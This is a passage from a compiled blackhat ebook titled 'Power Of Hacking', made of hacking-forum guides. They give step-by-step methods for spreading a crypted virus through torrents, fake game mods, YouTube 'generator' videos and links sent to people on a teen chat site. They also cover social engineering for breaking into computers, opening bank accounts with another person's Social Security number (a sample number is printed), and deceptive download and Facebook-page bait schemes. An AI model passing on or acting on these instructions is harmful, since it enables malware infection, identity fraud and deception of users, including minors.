There is a simple way to fight against this. Ask them to post on your thread, go into VIP section, set there away status with your name in it, etc. This is the only way to find out If they are faking there name or not. SECOND METHOD. The second method is also where scammers will edit a value. Sometimes a seller will ask “Can I see proof of the money”. Some scammers will just block then and there. Others will edit the value just like before. BEFORE AFTER Just like that, I have $450. See how easy it is just to fake information? This is another way scammers can even scam the most secure buyers/sellers. There's no 100% way to fight back at the Paypal Method. Chapter 5 - Buying Installs. When buying installs, always get proof of bots, anyone can edit their DDoSer connection number, you should ask for proof of bots over teamviewer. You should always get the person to let you Mail:mtahirzahid@yahoo.com

Page 77


Power Of Hacking® be on their teamviewer while they send the bots/crypt your file. Once again, they may use the excuse “Sorry, can't use teamviewer, I’m on Linux”. Don't always believe them. Ask them to send a screen shot for proof there on Linux, If they are a legit buyer/seller, they should have no problem sending you the picture. Also, search up on the user to find out If they are legit or not. Chapter 6 – Buying Crypting. Alright, imagine this. You finally make this awesome virus! You can't wait to spread it around! But then you remember that your virus is easily detected by many anti-viruses. So what do you do? Buy crypting; when buying crypting get on the persons teamviewer when they crypt your file, or else they could be binding their server to your server, so they get all the bots you get. Also, they may not even be using a good crypter. They could be use some free crypter that they found online for all you know. Chapter 7 - How Not to be a Victim. There are some simple ways to fight back against scamming. If you're selling something over the price of $100 (Or close to that), Before they buy anything say. “I have the right to hold your money for 24-48 hours before giving you with purchase”. This is because, If someone is using a stolen Paypal; it could take 1-2 days before the owner notices the amount missing. This way, If the Paypal is stolen, you won't get scammed. Lastly, If you have ANY doubt in anything your selling/buying don't do it then! Most of the time your gut can be right. Mail:mtahirzahid@yahoo.com

Page 78


Power Of HackingŽ Chapter 8 – What To Do If You Do Get Scammed. Alright, you may be freaking out right now If you do get scammed. But remain calm, there are a few things to do to report the scammer/ warn others. Go to, Market Place > Market Place Discussions > Scam Reports. From there create a new thread, and fill out the following form. Link to thread: Description: Screen shots/Images of scamming in action and proof of purchase : This form will allow you to make a legit scam report. Also leave a comment on the thread, warning others of the scammer! Thank you for this eBook! There will be future updates! If you purchased this eBook, (Hopefully you did) you will get the update for free! If you have ANY questions at all, feel free to contact me on HF. Spreading Guide By THEASSASIN Introduction: In this e-book , I will show you how to spread your virus. What you need: - a FUD server - a brain - different accounts (you will know which later) Structure of the guide: 1:Spreading via torrent 2:Spreading via social social engineering 3:Spreading via Youtube 1: Spreading via torrent: Mail:mtahirzahid@yahoo.com

Page 79


Power Of Hacking速 For spreading via torrent is a good binder required. The easiest way of doing this is too download popular torrents. A way of finding out which torrents are popular at the moment, is for example: http://thepiratebay.org/top/all 1:Choose one and download it 2:bind your virus to it 3:upload to different torrent sites The most popular torrent tracker (public): - Kick Ass Torrents.com - Torrent Funk - Isohunt.com - thepiratbay.org - btjunkie.org - (Demonoid) / It is a private tracker so you need a invite - There are many more! You can visit http://netforbeginners.about.com/od/peersharing/a/ torrent_search.htm What is important? - find seeder for your torrent - write a detailed description - use pictures 2: Social Engineering This one is my favorite way of spreading. You have to play with the people's dreams and wishes. There are many ways to do this. Most important is to be creative. Mail:mtahirzahid@yahoo.com

Page 80


Power Of Hacking速 I will show you two as an example now. Gaming: (There is a high chance of getting steam accounts) There are a lot of gaming forums in the web. Try to upload your virus as a game mod or patch. http://www.tesnexus.com/ http://www.fallout3nexus.com/ http://www.dragonagenexus.com/ Chatting : Use websites like http://www.321teenchat.com/ Write them that you want to chat with them. Find out what they like. Finally send them your link. 3: Youtube.com 1. make about 10 copies of your virus 2. rename them to: -World of Warcraft GameCard Generator -Runescape PIN Generator -Steam Game Adder -Facebook password finder -Zynga Poker Chips hack -Cabal online BOT -World of Warcraft auto levler cheat -Software Cracker -Rsbots auth generator -Microsoft Serial Generator -Counter Strike Source Hack Mail:mtahirzahid@yahoo.com

Page 81


Power Of Hacking® -World of Warcraft GameCard Generator -Free accounts -WOW bot -Steam account cracker 3:You can leech videos from “Youtube.com” or make you own videos with “camstudio” for example. 4:If you chose to make your own video,you have to download fake apps or make your own with “Visual Basic”. (all can be found on “Hackforums.net” ) 5:Upload your video and write a good description. (mention how you get the app) 6:Ask in different forums if they can vouch your video. The Way of the Blackhat “2+2=5” By owning this guide you agree to not resell, distribute or make public in any kind of way the information contained within these pages. Furthermore, you agree, by possessing this guide, to never pose as the writer of this eBook. | Chapter 1 | Knowledge First things first, we all must understand that a good hacker never stops learning. This applies to much more than software and hardware knowledge. Although keeping up with technological progress is already a huge task, a good hacker must also take care of his „second personality‟. Right now you Mail:mtahirzahid@yahoo.com

Page 82


Power Of Hacking® must be wondering “Second personality… WTF?” ; “Hackers have schizophrenia?” ; “Is the author on crack?”. Well, to clarify on this point, we must see hackers as having two sides. One side is the „good boy/girl‟ side that you show off in society (school, work, etc.). This side can help the other one which is the „bad boy/girl‟ (that you only show off with trusted people, hacking networks, etc.) by doing social manipulation [social engineering] – see | Chapter 2 | for more information on social engineering. With these two sides comes a „priority of operations‟. This means that one side is more important than the other and takes over the other in certain situations. The more important side is the „good boy/girl‟ side. For example, if you‟re in class with trusted people (people that know about your „bad‟ side) you should NOT give any clue on your true personality whether it‟d be by talking about your activities, actually hacking the teacher‟s computer, etc. The funny fact is that the side that makes a hacker who he is is usually kept secret. This is done, mostly, to assure correct and working social engineering. Pattern draw: Fake „good‟ side = gathering important/somewhat sensitive information from people Real „bad‟ side = exploit/abuse/take advantage of the information gathered to obtain private/extremely sensitive data (CC, bank accounts, online accounts, etc.) As we all know (I hope), technology evolves rapidly, even Mail:mtahirzahid@yahoo.com

Page 83


Power Of Hacking® more since the last decade. This means that new hardware and software are implemented in mainstream computers (the computer of your average Joe) every few years. One thing most hardware makers make sure of when releasing a new product on the market is guaranteed product‟s stability. In order to make a hardware piece stable (safe from crashes/destruction) good software must back it up. Hardware does not go without software and vice versa. This is an obvious fact, but it‟s at the core of machine hacking. To keep up with software advances is a very hefty task. It is so, because most archives of software updates on the Internet aren‟t well organized and most companies publish limited information on their releases. Another reason behind this is the fact that there are a lot of developers out there. A LOT of them. As far as I know, there aren‟t any statistics out there on the subject, but I‟d say the ratio of software developers to hardware developers is 1000:1 (probably even more – I wouldn‟t be surprised). Now, the reason behind software developers being more popular is a social tendency. All this to say that the trick in keeping up with technological evolution is to follow the hardware evolution. Companies provide full information about their updates to existing hardware, new releases, etc. There is no reason in keeping it a secret because reverse engineering exists and it can provide all the details of a new piece of hardware. You might say “Reverse engineering exists for software as well!”. That‟s very true, but it doesn‟t get you very far. Mail:mtahirzahid@yahoo.com

Page 84


Power Of Hacking® By reading about new hardware development, you also are referred to associated software development. Archives usually link software updates (called firmware updates when they are implemented in hardware directly) to their released products. This makes it easy for you to be up to date with the new „security‟ measures. Let‟s take the popular routers made by Linksys as an example. These come in play when trying to hack your neighbors wireless network key (WEP/WPA). Their support website (http://homesupport.cisco.com/enus/wireless/linksys) gives you access to any of their router‟s firmware updates/release notes/etc. In conclusion, a hacker must be well aware of his actions and must be up to date with the latest security software found in mainstream computers. | Chapter 2 | Social manipulation [engineering] Social engineering is done by everyone, not only hackers. Most of us don‟t even realize we do it. It‟s something that is somewhat subconscious if not done abusively. When we want something very badly, our brain works to understand how people that can potentially get us to our goal function. By understanding these persons in a better way, we are able to manipulate them to achieve our goal. Manipulating people can go from saying a few words to elaborating a whole scheme to gain their trust. It can be a piece of cake, but it can also be a Mail:mtahirzahid@yahoo.com

Page 85


Power Of Hacking® pain in the arse. The difficulty of manipulating someone varies according to a huge amount of factors. Here are some of these factors: ou know the better);

know, the worse);

trust you, you need to earn their trust before proceeding to manipulating); e person (the more, the better – obviously);

very kind person). - The list goes on and on * This applies to the most common kind of manipulation – information extraction. When you want to extract information on a person’s machine, you have to do it very subtly or else the person might realize your plans. It doesn’t really apply to other kinds of manipulation – such as getting someone to buy something for you – because they are mostly aware of what you want but are convinced in doing what you want. Here is a brief example of social engineering:

Mail:mtahirzahid@yahoo.com

Page 86


Power Of Hacking® Goal of the hacker: Get into the target‟s computer

- Introduce yourself and make small talk - Continue making conversation – - You leave with few information, but enough if you are an experimented hacker – You have his OS and his e-mail address. You can get his IP address either by IM or by receiving a simple e-mail from him and checking the e-mail‟s source. Once you have his IP address and you know his OS, you can exploit (metasploit, etc.) – see | Chapter 3 | for more information on basic hacking tools - and

Mail:mtahirzahid@yahoo.com

Page 87


Power Of Hacking® gain access to his computer † . Once done, your goal is achieved.

† This involves using software applications such as Nmap (port scanner), virtual machines, metasploit (host software exploiter), etc. Social engineering helps you in your software usage. This is obviously a basic example of social manipulation – more precisely, information extraction. In this case we haven‟t manipulated much, but sometimes that‟s all we need. You might wonder “Is it really moral to be a social engineer?”. Of course NOT! Actually, it depends on who you are. Since everyone is a social engineer and everyone manipulated someone at some point, we could consider it perfectly normal and moral. Although, some persons abuse it and manipulate people all their life. In this case we could consider it being immoral. But, some people consider it moral, because they put the blame on the people being manipulated (saying they are too blind). Mail:mtahirzahid@yahoo.com

Page 88


Power Of Hacking® The fun fact is that experimented social engineers could change the face of the world for the better. Since they have a „gift‟ to convince people to do things for their own benefit, they could convince people to do thing for the world‟s benefit. Yep, they do have a big influence. Just as an example, a social manipulator could convince someone to donate money to charity. But, of course, once you are able to do that, you only think about yourself and about the big money YOU could get. In conclusion, you and me are social engineers. We can develop our engineering abilities in this domain simply by practice and study of our entourage. | Chapter 3 | Basic „must-have‟ hacking tools This section is dedicated to software commonly used by hackers and what their purpose/utility is. A brief description will be given, since I do not want to make this eBook 200 pages long :P. This section doesn‟t follow the philosophical intent of the book, but I feel it necessary to give out the basics. ~ Yay! No more bla bla… We finally get something worth our time! :P ~ Nmap: Download link: http://nmap.org/download.html Nmap is a „security port scanner‟ that finds vulnerabilities in machines. It detects running programs on certain open ports of the targeted computer and gives you detailed information on the program in question. With this tool alone you CANNOT gain access to someones Mail:mtahirzahid@yahoo.com

Page 89


Power Of Hacking® computer. You need to pair it up with an exploiter such as metasploit (that will be our next subject). Interface screenshot:

Metasploit: Download link: http://www.metasploit.com/framework/download/ Metasploit is a command-line based „framework‟ (as they like calling it) that shows you and lets you Mail:mtahirzahid@yahoo.com

Page 90


Power Of Hacking® use dozens and dozens of public and somewhat private exploits. There are exploits for Windoze, Linux and Unix OSes. Basically, you take the vulnerabilities you found with Nmap and exploit them with meta . No screenshot as it is command-line (meaning the interface will be your OS‟s console) VirtualBox: Download link: http://www.virtualbox.org/wiki/Downloads VirtualBox is a free open source virtual machine creator. Get rid of the overrated VMware :P. At the base this does the same thing as VMware except it doesn‟t require you to crack it because it‟s FREE! This will allow you to run a second OS at the same time as your main OS. It creates a guest OS and you can control it at the same time as your controlling your main OS. Very useful when you want to be able to erase sensitive data that you acquired while hacking (whereas if you did it on your main OS, you‟d probably have to cook your hard disk to destroy all evidence).

Mail:mtahirzahid@yahoo.com

Page 91


Power Of Hacking® Interface screenshot:

- In this version (yes I will make a V2) I will only „give out‟ these three programs as the main hacking programs – There are hundreds maybe thousands of different goals when hacking. These programs can‟t cover all the types of hacking. This time, I decided to cover the basics on the most popular kind of hacking: hacking another machine. / HackForums links to useful hacking tools and threads \ *Note: These links may go down in time as threads on the forum get deleted ∞ ∞ RATs/Keyloggers/Stealers by Anubis™ http://www.hackforums.net/showthread.php?tid=595859 ∞ ∞ Index of hacking tutorials by Valiant http://hackforums.net/showthread.php?tid=504268 ∞ ∞ List of MD5 web crackers by th3.g4m3_0v3r Mail:mtahirzahid@yahoo.com

Page 92


Power Of Hacking® http://www.hackforums.net/showthread.php?tid=591358 ∞ ∞ Crypters/Binders/Virus Builders by flAmingw0rm http://www.hackforums.net/showthread.php?tid=238890 ∞ ∞ Security programs by protocol™ http://www.hackforums.net/showthread.php?tid=592772 ∞ ∞ Ultimate guide to PC Security by Vaqxine http://www.hackforums.net/showthread.php?tid=34240 ∞ ∞ Hack a Gmail account http://www.hackforums.net/showthread.php?tid=572968 ∞ ∞ Botnet setup http://www.hackforums.net/showthread.php?tid=101297 ∞ ∞ Wireless network hacking http://www.hackforums.net/showthread.php?tid=502252 I hope you enjoy! Notify me if ever one of these links goes down/changes and I will gladly update it. | Chapter 4 | The Brotherhood 0. Intro This chapter is dedicated to hacking communities and the people that are found in them. Hacking communities are places for hackers to share their knowledge and progress. Most often, the communities allow any hacker to enter – whether it‟d be the extremely advanced hacker or the beginner „n00b‟ hacker. If you are a beginner, do not hesitate to ask around, although not too much :P. People are there to help you and, if you ask politely, Mail:mtahirzahid@yahoo.com

Page 93


Power Of Hacking® you will more than certainly get an adequate answer. 1. Rules Hacking communities, as real-life social communities, have rules you must obey to. They are common sense rules that make the stay at the community more pleasant [such as NO SPAMMING]. “I thought hackers were free to do whatever they wanted.” It‟s partially true. Even hackers are limited in their actions. If they wouldn‟t be, the Internet would be chaos. Furthermore, they are free to break the rules, but they will have to suffer the consequences of doing so. There are users (usually users that don‟t have much hacking experience) that join a hacking community just for the heck of breaking the rules and pissing everyone off. For example, HF has a rule forbidding users to post a infected files. This is done to keep the hacking level between members to a minimum. There has been, although very few cases, persons who joined and posted infected files for users to download, saying it was a good hacking tool. Usually new users (with low post count when it‟s question of a forum) are suspected of breaking rules/scamming others/etc. It‟s a very normal way of thinking. This is an auto-protection measure that you have taken all your life and will continue taking. Remember when your mummy told you “Never talk to strangers”? Well, this is exactly a „stranger‟ case. Nobody knows much about the new user and therefore, he is a stranger. We never trust strangers. Although, everyone has started off as Mail:mtahirzahid@yahoo.com

Page 94


Power Of Hacking® a new user at some point and progressed out of it. This to say that new users should at least gain a certain respect from other members. Not necessarily their trust but at least their respect. A lot of „older‟ users treat new users badly because they associate „stranger‟ to „no trust‟ and „no trust‟ to „not worthy of anything else either‟. 2. Community vs. Community Some communities hate other communities for the reason being that they copy most of their content (without crediting most of the time). This provokes endless flaming wars and leads to an eventual DoS/DDoS of one of the community‟s website. The website that remains up is declared „winner‟. Although, as I have had the opportunity to see this a few times, the remaining community is soon to be DDoSed as well by the others. In the end, nobody wins and it‟s just a waste of time and keystrokes. The solution to this is to not care about other communities‟ work/actions and to take care of OUR users. This way, we are the ones being promoted. ~ More in v2 | Up Next | Plans for v2

4 chapters; -depth hacking tutorials;

Mail:mtahirzahid@yahoo.com

Page 95


Power Of Hacking®

programs. This eBook was more of a tease compared to the upcoming one. Everything I produce will be kept free! I hope you enjoyed! Disclaimer: I do NOT recommend doing any of the above. Everything stated in this book is for informational and educational purposes ONLY! Use at your own risk. If you have any questions or suggestions I would be more than glad to hear what you have to say and help you! Just PM me on HF. Note from the author: The reason I made this eBook free is because I believe in free access to information and promote and support open source, free applications! ~ Believe in free access to information ~ ~ Believe in Open Source ~ ~ Believe in theoretical ~ ○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○○

Mail:mtahirzahid@yahoo.com

Page 96


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 97


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 98


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 99


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 100


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 101


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 102


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 103


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 104


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 105


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 106


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 107


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 108


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 109


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 110


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 111


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 112


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 113


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 114


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 115


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 116


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 117


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 118


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 119


Power Of Hacking速

Hello. I will show you how to earn money very fast. All you have to do is to work 1 time. And Then the money will fly into your account. And if you work more you earn more. Follow theese steps to start. Note: This tutorials is for the new dudes wich wants to earn money. Step 1) Go to this site www.adf.ly Mail:mtahirzahid@yahoo.com

Page 120


Power Of Hacking速 And Register (This link will open in a new tab) Step 2) Go To ShareCash.org. Step 3) Go to http://www.youtube.com and register. Step 4) Make an .txt and upload it twice in $harecash. Step 5) Make Adf.ly link to each one of them. Step 6) Download Windows movie maker. If you have it you don't need to download. Step 7) Make a video with this text only: Go To Description for more information! Step 8) upload the video around 1000x times. (lol you can do 5 videos if you want but if you want to be really really rich do 1000x +) Step 9) Giving out my level 138 RunesCape account Here is the link: and link your adf.ly link. And continue uploading videos and do the same.. And spread your refeeral links for adf.ly and $harecash you will earn So Much cash xD How To Create Unlimited US Bank Accounts Allowing You To Verify PayPal Accounts. What can I do with this guide? - This guide is used to show an individual how to create multiple US bank accounts. These bank accounts can be used mainly for Verifying only US PayPal accounts. Can I resell your guide? No, definitely not. You wouldn't want this guide to be exposed and PayPal will find out just like how PayPal caught a lot of individuals using Netspend. What are the requirements to becoming successful in this method? You will need: - A social security number [doesn't need to be yours, just find a working one, the SSN will Mail:mtahirzahid@yahoo.com

Page 121


Power Of Hacking速 only be used once. Hey use this number and just change up the last digits 559-44-3632 - A lot of Netspend accounts [ This shouldn't be a problem. Just create a lot of Netspend accounts or you can just use one for yourself. It's doesn't matter, it's according to how much banks you want created You can download some valid US addresses here http://uploading.com/files/15f32392/Valid_Addresses.txt/ note: Some addresses are already taken, you can just change the street address last 2 digit numbers. - Must understand well Most of you already know about this, you must understand every detail of this guide cause it's very simple Lets start! Step 1- Firstly, we are going to create our main bank account. Go to https://www.usaa.com/inet/ent_logon/Logon Step 2- Join usaa Step 3- Fill in some legit looking info (doesn't have to be yours) Step 4- After you click next, choose no for both then hit next again Step 5- Put in a Valid US Address then hit next. Step 6- Create your own online id,password and pin. Please save your information on a notepad or something Note- Put online ID in capital letters Step 7- Read their online agreement and click I agree (Don't have to read it lol) Step 8 - Create your own security questions and answers (Please save this important info) Step 9 - Verify your info and hit submit. Step 10- Go to products and Services now

Mail:mtahirzahid@yahoo.com

Page 122


Power Of Hacking速 Step 11- Scroll down the page and click "Savings" Step 12- Click "Open an account" Step 13 - Click "Get started" Step 14- Choose "Savings" option. Step 15- Choose yes for physical address option and click next Step 16- Choose "Do not deliver my documents at usaa.com" then press next Step 17 - Click the transfer funds option and click use another account Step 17.1 - Click "Savings" as account type, click yes for signature authority ,enter your netspend account and routing number, choose a nickname and click next Step 18- After clicking next, click submit Step 19- Put in $27 and click next Step 20- Tick 3 box above, choose yes below and click submit Step 21 -View your info and click submit Step 22 - Bingo! Now go to "my accounts" Step 23 - Click your account you just made Step 24 - Now look at your sexy new account and routing number. Add your info to your Paypal account and automatically get verified How To Get PayPal Verified Now? 1. Go to PayPal.com 2. Login 3. Hit the "Get Verified" link 4. Choose "Add Bank" 5. Add in detailsBank Name- usaa bank Account type- Savings Mail:mtahirzahid@yahoo.com

Page 123


Power Of Hacking速 Account numberRouting number6. Then click next. 7. Click "Confirm Instantly" 8. Fill in your details and hit confirm instantly9. Congratulations! You are now PayPal Verified Username: xC0D3Rx Terms: DO NOT RE-SELL OR DISTRIBUTE WITHOUT MY PERMISSION. DO NOT LEAK THIS GUIDE INTO THE PUBLIC AS IT WILL END THE SAME AS NETSPEND DID AND NO ONE WILL BE ABLE TO GET VERIFIED ECT. AND LOTS WILL BE CAUGHT OUT. Dominating ShareCash! ShareCash is a site much like Uploading.com as it allows you to upload files and then pays you as you get others to download your files. The difference between ShareCash and other sites is that ShareCash will pay A LOT more. ShareCash pays 300 to 600 dollars for every 1,000 downloads, where Uploading.com pays around 5 dollars for every 1,000 downloads. What I am going to show you right now is how you can grab a hold of ShareCash and make AT LEAST 50 dollars a day from it! So first if you have not yet done so, go over to www.sharecash.org and sign up for an account. There is no fee to sign up and it takes a few minutes to do so. Now you should familiarize yourself with the site so take a good 5 minutes or so to look around. Note the Upload button on the side, that is where you will go to Upload your files. THE METHODS! Now I have spent some serious time developing these methods and making them work. Some are quick and easy and will bring some good cash while others will take more time, Mail:mtahirzahid@yahoo.com

Page 124


Power Of HackingŽ but will bring unbelievable cash! Method 1: Youtube This is an easy way to get started. People will download anything from youtube. So to get started make sure you have an account with youtube. Next go over to daily motion and find a good strip tease video where the girl gets naked at some point in the video. Download the video from daily motion using www.keepvid.com and fire up windows movie maker. The idea is that we want to post the video up to the point where it becomes obvious that the girl is about to show off some skin (boobs or bottom half) and then we cut the video right there. Now what your going to do is upload the cut portion to youtube. Since there is no actual nudity in this video (since you cut it out) youtube will not take the video down. Upload the entire video to sharecash and put the link in the description box next to your video. Give the video a long sexy name and watch as people download the entire video from your link in order to see the girl naked! Tons of people search for girls on Youtube so your videos will get plenty of views very fast. Method 2: Orkut and Myspace method Signup to yahoo and myspace account. Make around 300-400 friends on them. It will take little bit of time but you can do it easily if you spend around 1 hour daily on that and add around 50 persons a day. Its not so easy but its not even so hard. I got around 500 friends within two weeks. Most important thing: Concentrate only of UK, US and Canada people because sharecash only pays for these countries signups. It would be much easier for you if you join US and UK communities. If you are comfortable then try to make your profile by a girl’s name. Mostly people add a girl more commonly than a guy.

Mail:mtahirzahid@yahoo.com

Page 125


Power Of Hacking速 After creating a ID with 400-500 friends. Add your uploaded pic in your profile or update status. For example: Create a notepad file. Clock it with your sharecash link and add in your profile. Encourage peoples to download your file by saying that this is your phone number, coolest or sexiest pic of yours, or be wilder like this is my nude cam show download it. There will be many hornies there to download your stuff. Update your profile daily and keep on adding more US and UK friends. Method 3: Forums are your friend! Ahh yes forums my favorite place to get downloads from. So what we're gonna do for this method is find any porn forum and copy a few porn passwords that people post up. If you just look around at a few places like http://forum.dumpstersluts.com/ you'll find a few passwords. Now go ahead and copy those passwords into a text document and archive it with winrar. Here's where we're going to do things a little differently. Most people will go and outright post these files on the forums with your download link. Now this will bring in a few bucks, but when the passwords run out or someone sees a few postings about how they already use these passwords, your thread is pretty much dead. Instead your going to sign up to as many porn forums as you can and place your download link in your signatur with anchor text such as "Free GangBros Passwords." Then just post all over the place saying things like "Wow nice video" or "Thanks for the videos" stuff like that so people will see your name and signature. If the forum will not allow your download link in the signature just make a free blogger blog with the download link on there and have your signature redirect them there with the same achor text. You will see huge traffic with this method, trust me everyone wants free porn passwords! Method 4: Roms and Emulators Mail:mtahirzahid@yahoo.com

Page 126


Power Of Hacking速 This is my biggest money maker by far, and its actually pretty easy to set up. The only reason that this is the most advanced method is because it requires a few things such as a website, hosting and some experience in creating a website and making it look decent. If you can make this method happen you will see a huge amount of downloads come through. What you do is search for nintendo ds roms and emulators in google. Now when you find a good site just download as many as you can. I use a few sites to download ds roms, but starting up I just went to mininova and downloaded a huge file with like 100+ ds roms. This got my site off the ground much faster and took the hassle out of downloading a 100 or so files seperately. Just upload all the files to sharecash seperately and post them on your new website. If you keep your site updated with new releases you can get a couple thousand downloads in a day easy. If you submit your site to any of the top 100 Rom lists you can get some awesome traffic that way. Altermatively you can submit to digg and reddit claiming that you've found the best DS Rom site on the web. Just remember to put a disclaimer on your site stating that all roms downloaded need to be deleted within 24 hours unless the legal copy is owned. That statement will keep your rom site legal so dont forget it! Method 5: Digital Comics Digital Comics are very popular on the web currently, and no one is using sharecash to promote online comics. There are a few things you can do here. For one you can visit http://www.lorencollins.net/freecomic/ and download a few comics and then post them on a blogger blog. Of course digg traffic works well here since comics usually cost money to download online. Another way to explode this is to use a site called 4chan.org. Now what you do is visit the comic section pick a comic book you downloaded and post the front cover and then next to that post the download link. A small description will help with this and get a couple people commenting on it. Again everyone loves free comics and 4chan is a great place to get your comics downloaded. Mail:mtahirzahid@yahoo.com

Page 127


Power Of Hacking速 Method 6: Exploit Lazyness This is probably my favorite method just because its actually very creative. What you need to do is go to any manual traffic exchange (look on google you'll find a ton) and sign up to a few. Upload a large picture or any small program that is about 1 to 2 megs in size and name it "Traffic Exchange Bot." Make a quick blogger blog and delete everything from the page except for the post and title. Make The title large and the body easy to read. State that you have a free traffic exchange bot that they can have to use for the traffic exchange they are on. You can customize the page and make one for each traffic exchange you use. People will download the file hoping for a bot, even if you dont have a bot for them to download once they download the file and see that its not a bot they will more than likely just move on with their traffic exchanging while you just got a download out of it! Make sure you .rar the file that you upload so it appears believable. You can participate in the exchange to get credits or just buy some, either way you will get conversions easily since everyone hates having to do manual traffic exchanges. Method 7: Current Blackhat Niche Method: Michael Jackson of course! Download a dramatic looking picture of Michael Jackson (A close up of his face or whatever) and edit the photo by placing a caption of a quote and his life span (1958-2009 or whatever). Throw up a blogger blog saying everyone should pray for Michael Jackson and download this picture and put it as their background for their computer. There are way to many nuts out there for this not to work! Put a link to it on digg and reddit with a title saying something like "Support Michael Jackson's family, download this picture and place it as your background. Pictures honoring the king of pop" Just remember to make your title as long as possible and you'll be fine! Method8: Take help of websites or blogs Mail:mtahirzahid@yahoo.com

Page 128


Power Of HackingŽ It was the simplest method and yet most reliable method. If you have a good website which got around 1K-2K visitors per day then create a simple banner and clock it with your sharecash URL. Try to give free ebooks related to your niche. Peoples just love free stuffs. For getting free ebook or something you can simply search on google, rewrite the whole content and then go. If you want to be bully then simply copy paste that method and give it for free. Ask your friends to place your free stuff clocked banner of URL to place on their websites or blogs. Method9: Make your website or blog especially for sharecash People just love free stuffs. When you are start getting some decent money from sharecash, just invest in buying a domain and hosting and make website dedicated to downloading free stuffs. SEO it regularly or to improve traffic always do yahoo answers posting along with link back to your website. Just don’t spam them otherwise you will be punished. Conclusion That's all for Sharecash Domination I hope you enjoyed this report, now get out there and make it happen! With these methods it'll be hard to not make $50+ a day unless you just dont take action! So nows the time to take action! Would you like to make a lot of Money With FaceBook? With this method, you will be able to make 100$-1000$ a day! Farmville is the secret of this method! In total, there is more than 80 000 000 farmville users in the world! This is why it is so simple to make money! What I will tell you today, is how to make money with Farmville!!! At first, you will need to creat a Facebook Fan Page! For this, please go to : http://www.facebook.com/pages/

Mail:mtahirzahid@yahoo.com

Page 129


Power Of Hacking® Then, please click on creat a page :

Then, please click on Brand, Product, or Organization:

And chose the categorie you want! On the “Name of the page”, Please use your imagination!!! Example of title: Mail:mtahirzahid@yahoo.com

Page 130


Power Of Hacking® 1) GET 100 FV CASH NOW – JUST BY JOINING THIS GROUP!!! 2) GET A SECOND CHICKEN COOP IMMEDIATELY! 3) GET A DOG IN YOUR FARM NOW!!! 4) FARMVILLE CHEATS – GET YOUR VILLA FOR FREE NOW!!! 5) Etc… Use your imagination!!!! :):):) -Now click on “Creat Page” at the bottom of the page! When you are in your facebook page, please click on the change picture button!

For example, if your fanpage is about dogs in farmville, you should put a farmville dog picture!!! Right after, you will need to click on the “ Info” button and then click on the “Edit

Mail:mtahirzahid@yahoo.com

Page 131


Power Of Hacking® Information”

1) In the “Founded” box, please write : 2010 2) In the “Website” Box, write nothing 3) In the “Company Overview” Box please write: HOW DOES IT WORK: Follow the simple steps below to get a Rooster and a second chicken coop (Bonus) completely free: Step 1 - Become a member of this group to be able to send the invitation . Just click on JOIN besides the picture. Step 2 - Send the invitation to all of your friends . Click in the "Suggest to Friends" Link on the left (below the farmville image) and let the verification process work. Step 3 - you will receive the Rooster + the chicken coop (Bonus) after the verification process.

Mail:mtahirzahid@yahoo.com

Page 132


Power Of Hacking® After these changes, it will look like this:

Now its time to Write something about “Your FanPage” How to do this? Take a look at this image!

On this field, please put: Mail:mtahirzahid@yahoo.com

Page 133


Power Of Hacking速 HOW IT WORKS!!! -Step 1 - Become a member of this group -Step 2 - Send the invitation to all of your friends. Click in the "Suggest to Friends" -Step 3 - Wait for the verification process! Now you will need to edit your page!

1) Edit the wall settings

Mail:mtahirzahid@yahoo.com

Page 134


Power Of Hacking® 2) Uncheck the “ Fans can write or post content on the wall”

Final step, Publish your page if it is not already done! Now we are at the second part, the more easy part :) go to http://www.FvHelper.Com and click on the affiliate program at the top right of the page!

After this, you will need to enter the correct information here: Mail:mtahirzahid@yahoo.com

Page 135


Power Of Hacking速

When This will be done, you will be an affiliate of a Farmville Bot! What does it mean? It means that you will make business by promoting your affiliate link with your facebook fanpage! In the affiliate sections, there is your Affiliate link. Each times that someone will go to this link, and that will buy your product, it will generate you 1,28$ If you make more than 200 sales/week, it will generate you 1,61$/sale If you make more than 400 sales/week, it will generate you 1,93$/sale If you make more than 750 sales/week, it will generate you 2,25$/sale Imagine if you have a facebook fan page with 500 000 members! This will generate you more than 200 sales a day, trust me, it works! Now you are at the step where you need to get more members in your fanpage! Invite all your friends to your new group, tell your friends to invite their friends to your group!!! When your group will exponancialy reach a lot of members, Mail:mtahirzahid@yahoo.com

Page 136


Power Of Hacking速 Promote you link!!! Publish this in your fanpage : === yourlink Howdy Farmers! Tired of making thousands of clicks per day to manage your farm? With farming extreme manager, that's a thing of the past! This amazing program can automatically harvest your farm, animals and trees in one click (and even while you're away)! EXTRA: It will also help you fertilize every neighbor, win every ribbon and win up to 100 thousand exp points per day! Don't miss this exclusive and limited opportunity. Get farming extreme manager today: yourlink === === yourlink Dear farmers, thanks for all the compliments! We are proud to announce that Farming Extreme Manager is now being used by more than 200 thousand farmville fans! If you don't know about it, with farming extreme manager you can automatically: - Harvest your farm, animals and trees in one click! - Help and Fertilize every neighbor and win other ribbons - Levelup Tricks to win up to 100.000 exp points per day Unleash the true power of farmville. Get your copy today: yourlink ===

Mail:mtahirzahid@yahoo.com

